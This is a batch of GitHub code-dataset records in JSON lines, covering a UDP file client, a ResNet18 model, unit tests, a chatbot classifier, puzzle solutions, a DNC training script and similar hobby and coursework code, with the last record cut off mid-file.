request of the file to the server\n message = \"get file\"\n sock.sendto(message.encode(), server_address)\n sock.sendto(fileName.encode(), server_address)\n\n #receiving the request flag\n #if the flag is 0 then the file has been found\n data, server = sock.recvfrom(4096)\n data = data.decode()\n \n if data == \"0\":\n\n #downloading the file on the client\n print(\"file found on the server\\ndownloading the file...\")\n\n #receiving the file contents from the server\n data, server = sock.recvfrom(4096)\n data = data.decode()\n #creating a new file with as name the fileName and writing the contents\n fileFolder = os.path.join(os.getcwd(),\"client_files\")\n filePath = os.path.join(fileFolder,fileName)\n newFile = open(filePath, \"w\")\n newFile.write(data)\n print(\"file downloaded\")\n\n #if the flag is 1 then the file has not been found\n elif data == \"1\":\n print(\"the file has not been found on the server\")\n\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n \n elif commandRequested == 3:\n\n #requesting the filename of the file the user wants to upload\n fileName = input(\"input the name of the file you want to upload: \")\n\n #reading the file\n fileFolder = os.path.join(os.getcwd(), \"client_files\")\n filePath = os.path.join(fileFolder, fileName)\n file = open(filePath, \"r+\")\n data = file.read()\n\n #sending the request, filename and file contents to the server\n message = \"upload\"\n sock.sendto(message.encode(), server_address)\n sock.sendto(fileName.encode(), server_address)\n sock.sendto(data.encode(), server_address)\n file.close()\n\n print(\"sending \" + fileName + \" to the server...\")\n\n #waiting for the server to awnser, telling the client the file has been uploaded\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #if the request flag is == \"0\" the file has been correctly uploaded\n if data == \"0\":\n print(fileName + \" uploaded correctly to the server\")\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n \n #closing the client program\n elif commandRequested == 4:\n sock.close()\n sys.exit()\n\n except Exception as e:\n print(e)\n \n print(\"\\n\\n\\n\\n\")\n","repo_name":"Oldranda1414/ProgettoReti","sub_path":"src/client/UDPClient.py","file_name":"UDPClient.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11890456709","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/12/11 16:34\n# @Author : zyf\n# @File : ResNet_18.py\n# @Software: PyCharm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\n\n'''\n CNN经典网络结构复现:LeNet5、AlexNet、VGG、ResNet、InceptionNet等\n ResNet18网络结构:18 = 1(conv1) + 2*2(第一个残差部分) +2*2(第二个残差部分) +2*2(第三个残差部分) +2*2(第四个残差部分) + 1(FC)\n 需要设计一个残差块,ResBlock设计:\n 包含两个卷积层,每个卷积层后面跟一个归一化\n kernel_size = 3 卷积核大小\n stride不固定,目的是为了降采样,保证残差的维度与真正输出的维度一致\n\n 第一部分卷积conv1:\n 输入:224*224*3\n 输出:112*112*64\n conv:kernel_size = 7*7 stride=2 padding=3\n \n 输入:112*112*64\n 输出:56*56*64\n max pooling : kernel_size =3 stride=2 padding=1\n \n 第一个残差部分conv2:\n 输入:56*56*64 输出:56*56*64\n 包含两个残差块,每个残差块里面有两个卷积层\n \n 第二个残差部分conv2:\n 输入:56*56*64 输出:28*28*128\n 包含两个残差块,每个残差块里面有两个卷积层,\n 其中第一个残差块要做下采样\n 第三个残差部分conv2:\n 输入:28*28*128 输出:14*14*256\n 包含两个残差块,每个残差块里面有两个卷积层\n 其中第一个残差块要做下采样\n 第四个残差部分conv2:\n 输入:14*14*256 输出:7*7*512\n 包含两个残差块,每个残差块里面有两个卷积层\n 其中第一个残差块要做下采样\n 自定义池化和全连接层\n avg_pool\n fc \n \n 注意:其实这部分的残差块与ResNet18的结构是一样的,不过是每个残差部分的数量不一致罢了,这里分开实现纯粹是为了代码熟练度。\n ResNet18 18= 1 + 2*2 + 2*2 +2*2 +2*2 + 1\n ResNet34 34= 1 + 2*3 + 2*4 +2*6 +2*3 + 1 \n'''\n\n\n# 设计18和34残差块,ResNet18和ResNet34 用的3*3的卷积,而且每个残差块都只有两层卷积\nclass ResBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_channel, out_channel, stride=1):\n super(ResBlock, self).__init__()\n # 残差块内的第一个卷积,当stride!=1时,要进行下采样downsample\n # 例如56*56*64 -> 28*28*128 的时候要进行downsample,这时候要stride=2\n self.conv1 = nn.Conv2d(in_channels=in_channel, out_channels=out_channel, kernel_size=3, stride=stride,\n padding=1)\n # 卷积后跟的bn层\n self.bn1 = nn.BatchNorm2d(out_channel)\n # 激活函数ReLu\n self.relu = nn.ReLU(inplace=True)\n # 残差块内的第二个卷积,k=3,s=1,p=1,这个卷积层没什么变化,in_channels和out_channels 是一样的\n self.conv2 = nn.Conv2d(in_channels=out_channel, out_channels=out_channel, kernel_size=3, stride=1, padding=1)\n # 第二个bn层\n self.bn2 = nn.BatchNorm2d(out_channel)\n\n # 快捷连接设计,也就是右边x的部分,在做残差相加的时候,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n self.shortcut = None\n print(in_channel, out_channel, stride)\n # 重点部分,当残差块要进行downsample的时候,快捷连接也需要进行维度的同步,\n # 同步的方法是采用一个1*1的卷积,同时stride=2\n if stride != 1 or in_channel != out_channel:\n self.shortcut = nn.Sequential(\n # 采用1*1的卷积进行维度同步 。下采��,W*H会变小 。\n nn.Conv2d(in_channel, out_channel, kernel_size=1, stride=stride),\n nn.BatchNorm2d(out_channel)\n )\n\n # 前向传播\n def forward(self, x):\n # 残差块的右边x\n identity = x\n # 残差块计算流程\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn2(out)\n # 快捷连接计算的结果\n if self.shortcut is not None:\n identity = self.shortcut(x)\n # 两个结果相加\n out += identity\n out = self.relu(out)\n return out\n\n\n# 设计ResNet网络结构\nclass ResNet(nn.Module):\n def __init__(self, nums=1000):\n super(ResNet, self).__init__()\n # 分类数\n self.nums = nums\n # 第一部分卷积conv1 输入:224*224*3\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=64, kernel_size=7, stride=2, padding=3),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n )\n # 第一个残差部分,包含两个残差块,由于没有涉及残差维度变化,两个残差块都是一样的\n self.conv2 = nn.Sequential(\n ResBlock(in_channel=64, out_channel=64),\n ResBlock(in_channel=64, out_channel=64)\n )\n # 第二个残差部分,包含两个残差块,四个卷积层\n self.conv3 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=64, out_channel=128, stride=2),\n ResBlock(in_channel=128, out_channel=128)\n )\n # 第三个残差部分,包含两个残差块,四个卷积层\n self.conv4 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=128, out_channel=256, stride=2),\n ResBlock(in_channel=256, out_channel=256)\n )\n # 第四个残差部分,包含两个残差块,四个卷积层\n self.conv5 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=256, out_channel=512, stride=2),\n ResBlock(in_channel=512, out_channel=512)\n )\n # 自定义池化层,用来固定输出的size大小\n self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))\n # 定义全连接层,输出是类别数\n self.fc = nn.Linear(512, self.nums)\n\n # 前向传播\n def forward(self, x):\n # 卷积层\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n # 自定义池化,固定输出大小\n x = self.avg_pool(x)\n # 将特征向量展开\n x = torch.flatten(x, 1)\n # 全连接层\n x = self.fc(x)\n return x\n\nx = torch.rand((2,3,224,224))\nres = ResNet()\nprint(res)\nout = res(x)\nprint(out)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nres = res.to(device)\nsummary(res, (3, 224, 224))\n","repo_name":"zyf-xtu/pytorch_models","sub_path":"cnn_models/ResNet_18.py","file_name":"ResNet_18.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"zh","doc_type":"code","stars":60,"dataset":"github-code","pt":"18"} +{"seq_id":"35752499755","text":"import logging\nimport os\nimport unittest\nimport pandas as pd\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom helper import *\nfrom l2_orderbook_tops import l2_orderbook_tops\n\nlogging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\n\n\nclass TestWatch(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super(TestWatch, self).__init__(*args, **kwargs)\n\n def test_bid_watch(self):\n input_data = (\n (pd.Timestamp('2019-01-01 00:15:54'), 100.00, 0.01, 1),\n (pd.Timestamp('2019-01-01 00:16:54'), 50.05, 0.02, 1),\n (pd.Timestamp('2019-01-01 00:16:54'), 45.05, 0.02, 1)\n )\n\n df = pre_process_input(input_data)\n ret = l2_orderbook_tops.get_tops(df, watch_dollar_dist_depth=5000).values\n\n final_iteration = ret[-1]\n self.assertEqual(final_iteration[-2], 30)\n\n def test_ask_watch(self):\n input_data = (\n (pd.Timestamp('2019-01-01 00:15:54'), 100.00, 0.01, 0),\n (pd.Timestamp('2019-01-01 00:16:54'), 149.00, 0.02, 0),\n (pd.Timestamp('2019-01-01 00:16:54'), 151.00, 0.02, 0)\n )\n\n df = pre_process_input(input_data)\n ret = l2_orderbook_tops.get_tops(df, watch_dollar_dist_depth=5000).values\n\n final_iteration = ret[-1]\n self.assertEqual(final_iteration[-1], 30)\n","repo_name":"Tiergarten/l2-orderbook-tops","sub_path":"tests/test_watch.py","file_name":"test_watch.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"39976327158","text":"import json\nimport re\nimport spacy\nimport numpy as np\nfrom autocorrect import spell\nfrom copy import deepcopy\nfrom os import path\nfrom os.path import basename\n\n# the ioid of this script for JSON payload 'from'\nioid = basename(__file__) # 'hello.py'\n# Load the spacy english model\nnlp = spacy.load('en')\n\nCONVO_CLASSES_PATH = path.join(\n path.dirname(__file__), '..', '..', 'data', 'convo_classes.json')\nCONVO_CLASSES = json.load(open(CONVO_CLASSES_PATH))\n\nMIN_SIM_THRESHOLD = 0.7\n\n\ndef vectorize_queries(convo_classes):\n for topic in convo_classes:\n topic_convo = convo_classes[topic]\n topic_convo['queries_wordvecs'] = []\n for q in topic_convo['queries']:\n q_vector = nlp(q)\n topic_convo['queries_wordvecs'].append(q_vector)\n return convo_classes\n\nvectorize_queries(CONVO_CLASSES)\n\n\n# helper to clean all text before operation\ndef clean_input(text):\n # first clean out symbols\n text = re.sub(r'[^\\w]', ' ', text)\n # then tokenize\n text = text.split()\n # then correct all spellings\n text = map(spell, text)\n text = \" \".join(text)\n return text\n\n\n# classify a conversation (topic) using wordvec\n# return a convo copy,\n# i.e. an object in convo_classes\ndef wordvec_classify(input_str):\n input_str = clean_input(input_str)\n input_v = nlp(input_str)\n high_score = 0\n high_topic = 'exception'\n org_convo = CONVO_CLASSES['exception'] # default\n for topic in CONVO_CLASSES:\n topic_convo = CONVO_CLASSES[topic]\n local_high_score = max([\n input_v.similarity(q_v) for q_v in topic_convo['queries_wordvecs']\n ]) if topic_convo['queries_wordvecs'] else 0\n if (local_high_score > high_score and\n local_high_score > MIN_SIM_THRESHOLD):\n high_score = local_high_score\n high_topic = topic\n org_convo = topic_convo\n convo = deepcopy(org_convo)\n convo['score'] = high_score\n convo['topic'] = high_topic\n return convo\n\n\ndef compose_response(convo):\n options = convo['responses']\n response = np.random.choice(options)\n return {\n 'score': convo['score'],\n 'topic': convo['topic'],\n 'response': response\n }\n\n\n# basic way to classify convo topic\n# then reply by predefined responses in data/convo_classes.json\ndef classify_convo(input_str):\n convo = wordvec_classify(input_str)\n response_payload = compose_response(convo)\n return response_payload\n\n\n# module method for socketIO\ndef classify(msg):\n # the reply JSON payload.\n reply = {\n 'output': classify_convo(msg.get('input')),\n 'to': msg.get('from'),\n 'from': ioid,\n 'hash': msg.get('hash')\n }\n # the py client will send this to target \n return reply\n","repo_name":"kengz/aiva","sub_path":"lib/py/convo_classifier.py","file_name":"convo_classifier.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":808,"dataset":"github-code","pt":"18"} +{"seq_id":"12749441054","text":"import functools\nimport itertools\nimport re\n\nfrom sympy.core import numbers\n\nimport utils\n\n\nREVERSE_RE = r'deal into new stack'\nCUT_RE = r'cut (-?\\d+)'\nINCREMENT_RE = r'deal with increment (\\d+)'\n\n\n@functools.lru_cache(maxsize=None)\ndef inverse(n, k):\n return numbers.mod_inverse(k, n)\n\n\ndef mod(n, *coeffs):\n return tuple(coeff % n for coeff in coeffs)\n\n\nCOEFFS = {\n REVERSE_RE: lambda n, a, b: mod(n, -1 * a, -1 * b - 1),\n CUT_RE: lambda n, k, a, b: mod(n, a, b - k),\n INCREMENT_RE: lambda n, k, a, b: mod(n, a * k, b * k),\n}\n\nINV_COEFFS = {\n REVERSE_RE: lambda n, a, b: mod(n, -1 * a, -1 * b - 1),\n CUT_RE: lambda n, k, a, b: mod(n, a, b + k),\n INCREMENT_RE: lambda n, k, a, b: mod(n, a * inverse(n, k), b * inverse(n, k)),\n}\n\n\ndef get_coeffs(n, techniques, reverse=False):\n if reverse:\n techniques = techniques[::-1]\n coeff_map = INV_COEFFS\n else:\n coeff_map = COEFFS\n\n coeffs = (1, 0)\n for technique in techniques:\n for regex, method in coeff_map.items():\n match = re.match(regex, technique)\n if match:\n coeffs = method(*itertools.chain(\n [n],\n [int(arg) for arg in match.groups()],\n coeffs,\n ))\n\n return coeffs\n\n\ndef shuffle(n, card, rounds=1, reverse=False):\n techniques = utils.get_input(delimiter=None, cast=str)\n a, b = get_coeffs(n, techniques, reverse=reverse)\n return (\n pow(a, rounds, n) * card +\n b * (pow(a, rounds, n) - 1) * inverse(n, a - 1)\n ) % n\n\n\n@utils.part\ndef part_1():\n print(shuffle(10007, 2019))\n\n\n@utils.part\ndef part_2():\n print(shuffle(119315717514047, 2020, rounds=101741582076661, reverse=True))\n","repo_name":"alexander-yu/adventofcode","sub_path":"problems_2019/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"5238175569","text":"from turtle import Turtle, Screen\n\ntimmy = Turtle()\ntimmy.shape('turtle')\ntimmy.color('red')\n\n#draw a square \nfor _ in range(4):\n timmy.forward(100)\n timmy.right(90)\n\n \nscreen = Screen()\nscreen.exitonclick()\n","repo_name":"kmshravani/100DaysofCode","sub_path":"Day 18/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7112812365","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n if not s:\n return 0\n dp = [[0 for i in range(len(s))] for j in range(len(s))]\n for i in range(len(s)):\n dp[i][i] = 1\n max_l = 1\n for r in range(2, len(s)+1):\n for i in range(len(s)-r+1):\n j = i + r - 1\n p1,p2 = 0,0\n if dp[i][j-1] == len(s[i:j]) and s[j] not in s[i:j]:\n p1 = dp[i][j-1]+1\n if dp[i+1][j] == len(s[i+1:j+1]) and s[i] not in s[i+1:j+1]:\n p2 = dp[i+1][j] + 1\n dp[i][j] = max(p1, p2, dp[i][j-1], dp[i+1][j])\n max_l = max(max_l, dp[i][j])\n # for d in dp:\n # print(d)\n # print(max_l)\n return max_l\n\n def lengthOfLongestSubstring1(self, s: str) -> int:\n i = 0\n max_l = 0\n while i < len(s):\n j = i + 1\n index_dic = {s[i]: i}\n while j < len(s) and s[j] not in index_dic:\n index_dic[s[j]] = j\n j += 1\n max_l = max(max_l, j-i)\n if j < len(s):\n i = index_dic[s[j]]+1\n else:\n break\n return max_l\n\n def lengthOfLongestSubstring2(self, s: str) -> int:\n occ = set()\n n = len(s)\n # 右指针,初始值为 -1,相当于我们在字符串的左边界的左侧,还没有开始移动\n rk, ans = -1, 0\n for i in range(n):\n if i != 0:\n # 左指针向右移动一格,移除一个字符\n occ.remove(s[i - 1])\n while rk + 1 < n and s[rk + 1] not in occ:\n # 不断地移动右指针\n occ.add(s[rk + 1])\n rk += 1\n # 第 i 到 rk 个字符是一个极长的无重复字符子串\n ans = max(ans, rk - i + 1)\n return ans\n\n def lengthOfLongestSubstring3(self, s: str) -> int:\n i = 0\n j = 1\n max_l = 1\n index_dic = {s[0]:0}\n while i < len(s):\n while j < len(s) and s[j] not in index_dic:\n index_dic[s[j]] = j\n j += 1\n max_l = max(max_l, j-i)\n if j < len(s):\n new_i = index_dic[s[j]] + 1\n for k in range(i, new_i):\n index_dic.pop(s[k])\n i = new_i\n else:\n break\n return max_l\nif __name__ == '__main__':\n s = \"pwwkew\"\n s = \"abcabcbb\"\n a = Solution()\n a.lengthOfLongestSubstring3(s)\n\n","repo_name":"longkun-uestc/examination","sub_path":"力扣网/3-无重复字符的最长子串.py","file_name":"3-无重复字符的最长子串.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12088384145","text":"\"\"\"Example script to train the DNC on a repeated copy task.\"\"\"\nimport os\nimport argparse\nimport logging\n\nimport torch\nfrom dnc.repeat_copy import RepeatCopy\nfrom dnc.dnc import DNC\n\n_LG = logging.getLogger(__name__)\n\n\ndef _main():\n args = _parse_args()\n logging.basicConfig(level=logging.INFO, format=\"%(asctime)s: %(message)s\")\n\n dataset = RepeatCopy(\n args.num_bits,\n args.batch_size,\n args.min_length,\n args.max_length,\n args.min_repeats,\n args.max_repeats,\n )\n\n dnc = DNC(\n access_config={\n \"memory_size\": args.memory_size,\n \"word_size\": args.word_size,\n \"num_reads\": args.num_read_heads,\n \"num_writes\": args.num_write_heads,\n },\n controller_config={\n \"input_size\": args.num_bits + 2 + args.num_read_heads * args.word_size,\n \"hidden_size\": args.hidden_size,\n },\n output_size=dataset.target_size,\n clip_value=args.clip_value,\n ).to(args.device)\n\n optimizer = torch.optim.RMSprop(dnc.parameters(), lr=args.lr, eps=args.eps)\n\n _run_train_loop(\n dnc,\n dataset,\n optimizer,\n args.num_training_iterations,\n args.report_interval,\n args.checkpoint_interval,\n args.checkpoint_dir,\n args.device,\n )\n\n\ndef _run_train_loop(\n dnc,\n dataset,\n optimizer,\n num_training,\n report_interval,\n checkpoint_interval,\n checkpoint_dir,\n device,\n):\n total_loss = 0\n for i in range(num_training):\n batch = dataset(device=device)\n state = None\n outputs = []\n for inputs in batch.observations:\n output, state = dnc(inputs, state)\n outputs.append(output)\n outputs = torch.stack(outputs, 0)\n loss = dataset.cost(outputs, batch.target, batch.mask)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n total_loss += loss.item()\n if (i + 1) % report_interval == 0:\n outputs = torch.round(batch.mask.unsqueeze(-1) * torch.sigmoid(outputs))\n dataset_string = dataset.to_human_readable(batch, outputs)\n _LG.info(f\"{i}: Avg training loss {total_loss / report_interval}\")\n _LG.info(dataset_string)\n total_loss = 0\n if checkpoint_interval is not None and (i + 1) % checkpoint_interval == 0:\n path = os.path.join(checkpoint_dir, \"model.pt\")\n torch.save(dnc.state_dict(), path)\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=__doc__,\n )\n model_opts = parser.add_argument_group(\"Model Parameters\")\n model_opts.add_argument(\n \"--hidden-size\", type=int, default=64, help=\"Size of LSTM hidden layer.\"\n )\n model_opts.add_argument(\n \"--memory-size\", type=int, default=16, help=\"The number of memory slots.\"\n )\n model_opts.add_argument(\n \"--word-size\", type=int, default=16, help=\"The width of each memory slot.\"\n )\n model_opts.add_argument(\n \"--num-write-heads\", type=int, default=1, help=\"Number of memory write heads.\"\n )\n model_opts.add_argument(\n \"--num-read-heads\", type=int, default=4, help=\"Number of memory read heads.\"\n )\n model_opts.add_argument(\n \"--clip-value\",\n type=float,\n default=20,\n help=\"Maximum absolute value of controller and dnc outputs.\",\n )\n\n optim_opts = parser.add_argument_group(\"Optimizer Parameters\")\n optim_opts.add_argument(\n \"--max-grad-norm\", type=float, default=50, help=\"Gradient clipping norm limit.\"\n )\n optim_opts.add_argument(\n \"--learning-rate\",\n \"--lr\",\n type=float,\n default=1e-4,\n dest=\"lr\",\n help=\"Optimizer learning rate.\",\n )\n optim_opts.add_argument(\n \"--optimizer-epsilon\",\n type=float,\n default=1e-10,\n dest=\"eps\",\n help=\"Epsilon used for RMSProp optimizer.\",\n )\n\n task_opts = parser.add_argument_group(\"Task Parameters\")\n task_opts.add_argument(\n \"--batch-size\", type=int, default=16, help=\"Batch size for training\"\n )\n task_opts.add_argument(\n \"--num-bits\", type=int, default=4, help=\"Dimensionality of each vector to copy\"\n )\n task_opts.add_argument(\n \"--min-length\",\n type=int,\n default=1,\n help=\"Lower limit on number of vectors in the observation pattern to copy\",\n )\n task_opts.add_argument(\n \"--max-length\",\n type=int,\n default=2,\n help=\"Upper limit on number of vectors in the observation pattern to copy\",\n )\n task_opts.add_argument(\n \"--min-repeats\",\n type=int,\n default=1,\n help=\"Lower limit on number of copy repeats.\",\n )\n task_opts.add_argument(\n \"--max-repeats\",\n type=int,\n default=2,\n help=\"Upper limit on number of copy repeats.\",\n )\n\n train_opts = parser.add_argument_group(\"Training Options\")\n train_opts.add_argument(\n \"--device\",\n type=torch.device,\n default=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n help=\"Device to perform the training.\",\n )\n train_opts.add_argument(\n \"--num-training-iterations\",\n type=int,\n default=100_000,\n help=\"Number of iterations to train for.\",\n )\n train_opts.add_argument(\n \"--report-interval\",\n type=int,\n default=100,\n help=\"Iterations between reports (samples, valid loss).\",\n )\n train_opts.add_argument(\n \"--checkpoint-dir\", default=None, help=\"Checkpointing directory.\"\n )\n train_opts.add_argument(\n \"--checkpoint-interval\",\n type=int,\n default=None,\n help=\"Checkpointing step interval.\",\n )\n args = parser.parse_args()\n\n if args.checkpoint_dir is None and args.checkpoint_interval is not None:\n raise RuntimeError(\n \"`--checkpoint-dir` is provided but `--checkpoint-interval` is not provided.\"\n )\n if args.checkpoint_dir is not None and args.checkpoint_interval is None:\n raise RuntimeError(\n \"`--checkpoint-interval` is provided but `--checkpoint-dir` is not provided.\"\n )\n return args\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"mthrok/dnc_pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"28698725430","text":"'''\n如何派生内置不可变类型并修改其实例化行为\n'''\n\nclass IntTuple(tuple): #跟原本的tuple是一样的\n def __init__(self,iterable):\n super(IntTuple,self).__init__(iterable)\n\n'''翻译__new__和__init__'''\nlist('abc') #下面两句等于加起来等于list('abc')\n\nl=list.__new__(list,'abc')\nlist.__init__(l,'abc')\nprint(l)\n\n'''使用__new__方法'''\nclass IntTuple(tuple):\n def __new__(cls, iterable):\n g=(x for x in iterable if isinstance(x,int) and x>0)\n # return super().__new__(cls, g)\n return super(IntTuple,cls).__new__(cls,g) #两句一样\n\nt=IntTuple([1,-1,'abc',6,['x','y'],3])\nprint(t)","repo_name":"Air-Zhuang/Test35","sub_path":"High_Level_Coding_python3/7/7_1.py","file_name":"7_1.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25097888646","text":"import numpy as np\nimport pytest\nimport torch\nfrom jina import Document, DocumentArray\n\nfrom finetuner import __default_tag_key__\nfrom finetuner.tuner.evaluation import (\n METRICS,\n Evaluator,\n __evaluator_metrics_key__,\n __evaluator_targets_key__,\n)\n\nDATASET_SIZE = 1000\nEMBEDDING_SIZE = 10\n\n\nclass EmbeddingModel(torch.nn.Module):\n @staticmethod\n def forward(inputs):\n return inputs.repeat(1, 10)\n\n\n@pytest.fixture\ndef embed_model():\n \"\"\"The embedding model\"\"\"\n return EmbeddingModel()\n\n\n@pytest.fixture\ndef query_session_data():\n \"\"\"The query data in session format\"\"\"\n data = DocumentArray()\n for i in range(DATASET_SIZE):\n doc = Document(\n id=str(i),\n blob=np.array([i]),\n matches=[Document(id=str(DATASET_SIZE + i))],\n )\n data.append(doc)\n return data\n\n\n@pytest.fixture\ndef index_session_data():\n \"\"\"The index data in session format\"\"\"\n return DocumentArray(\n [\n Document(id=str(DATASET_SIZE + i), blob=np.array([i]))\n for i in range(DATASET_SIZE)\n ]\n )\n\n\n@pytest.fixture\ndef query_class_data():\n \"\"\"The query data in class format\"\"\"\n return DocumentArray(\n Document(id=str(i), blob=np.array([i]), tags={__default_tag_key__: str(i)})\n for i in range(DATASET_SIZE)\n )\n\n\n@pytest.fixture\ndef index_class_data():\n \"\"\"The index data in class format\"\"\"\n return DocumentArray(\n Document(\n id=str(DATASET_SIZE + i),\n blob=np.array([i]),\n tags={__default_tag_key__: str(i)},\n )\n for i in range(DATASET_SIZE)\n )\n\n\ndef test_parse_session_docs(query_session_data, index_session_data):\n \"\"\"\n Test the conversion from session docs to the internal evaluator representation\n \"\"\"\n evaluator = Evaluator(query_session_data, index_session_data)\n summarydocs = evaluator._parse_session_docs()\n for evaldoc, summarydoc in zip(query_session_data, summarydocs):\n assert evaldoc.id == summarydoc.id\n assert summarydoc.content is None\n assert evaldoc.matches[0].id in summarydoc.tags[__evaluator_targets_key__]\n assert summarydoc.tags[__evaluator_targets_key__][evaldoc.matches[0].id] == 1\n\n\ndef test_parse_class_docs(query_class_data, index_class_data):\n \"\"\"\n Test the conversion from class docs to the internal evaluator representation\n \"\"\"\n evaluator = Evaluator(query_class_data, index_class_data)\n summarydocs = evaluator._parse_class_docs()\n for evaldoc, summarydoc in zip(query_class_data, summarydocs):\n assert evaldoc.id == summarydoc.id\n assert summarydoc.content is None\n targets = list(summarydoc.tags[__evaluator_targets_key__].items())\n assert len(targets) == 1\n target, relevance = targets[0]\n assert relevance == 1\n\n\ndef test_list_available_metrics(embed_model):\n \"\"\"\n Test the listing of available metrics\n \"\"\"\n assert Evaluator.list_available_metrics() == list(METRICS.keys())\n\n\ndef test_evaluator_perfect_scores(\n embed_model,\n query_session_data,\n index_session_data,\n query_class_data,\n index_class_data,\n):\n \"\"\"\n Test the evaluator when the matching limit is set 1. We expect all metrics == 1.0\n \"\"\"\n # test both for session and class data\n for _query_data, _index_data in [\n (query_session_data, index_session_data),\n (query_class_data, index_class_data),\n ]:\n evaluator = Evaluator(_query_data, _index_data, embed_model)\n metrics = evaluator.evaluate(label='foo', limit=1, distance='euclidean')\n print(metrics)\n for _, v in metrics.items():\n assert v == 1.0\n for doc in _query_data:\n for _, v in doc.tags[__evaluator_metrics_key__]['foo'].items():\n assert v == 1.0\n\n\ndef test_evaluator_half_precision(\n embed_model,\n query_session_data,\n index_session_data,\n query_class_data,\n index_class_data,\n):\n \"\"\"\n Test the evaluator when the matching limit is set 2. We expect all metrics == 1.0 except\n precision == 0.5 and f1score == 2/3\n \"\"\"\n # test both for session and class data\n for _query_data, _index_data in [\n (query_session_data, index_session_data),\n (query_class_data, index_class_data),\n ]:\n evaluator = Evaluator(_query_data, _index_data, embed_model)\n metrics = evaluator.evaluate(label='foo', limit=2, distance='euclidean')\n for k, v in metrics.items():\n if k == 'precision_at_k':\n assert v == 0.5\n elif k == 'f1_score_at_k':\n assert 0.66 < v < 0.67\n else:\n assert v == 1.0\n for doc in _query_data:\n for k, v in doc.tags[__evaluator_metrics_key__]['foo'].items():\n if k == 'precision_at_k':\n assert v == 0.5\n elif k == 'f1_score_at_k':\n assert 0.66 < v < 0.67\n else:\n assert v == 1.0\n\n\ndef test_evaluator_no_index_data(embed_model, query_class_data):\n \"\"\"\n Test the evaluator when no index data are given\n \"\"\"\n evaluator = Evaluator(query_class_data, embed_model=embed_model)\n _ = evaluator.evaluate()\n","repo_name":"ajjurcom/finetuner","sub_path":"tests/unit/tuner/test_evaluation.py","file_name":"test_evaluation.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"17036768259","text":"from flask import Flask, render_template\nfrom . import *\n\n\napp = Flask(__name__)\napp.config.from_object('config')\n\n@app.route('/')\n@app.route('/index/')\ndef index():\n return render_template('index.html')\n@app.route('/result/')\ndef result():\n description = \"\"\"\n Toi, tu n'as pas peur d'être seul ! Les grands espaces et les aventures sont faits pour toi. D'ailleurs, Koh Lanta est ton émission préférée ! Bientôt tu partiras les cheveux au vent sur ton radeau. Tu es aussi un idéaliste chevronné. Quelle chance !\n \"\"\"\n return render_template('result.html', user_name = \"eder\", user_image=url_for('static', filename='tmp/cover_111823112767411.jpg'),\n description=description, blur=True)\n\n\nif __name__ == \"__main__\":\n app.run(port=8012)","repo_name":"Nicolas-Turck/flask1","sub_path":"fbapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14683758092","text":"from scene import *\nfrom Draw_line import my_line\nfrom sound import play_effect\n\n\npic = Texture('mou1.JPG')\nfont = ('Apple Color Emoji',25)\nclass myscene(Scene) :\n\tdef setup(self) :\n\t\tself.background_color = '#f868ff'\n\t\t\n\t\tself.pic_node = 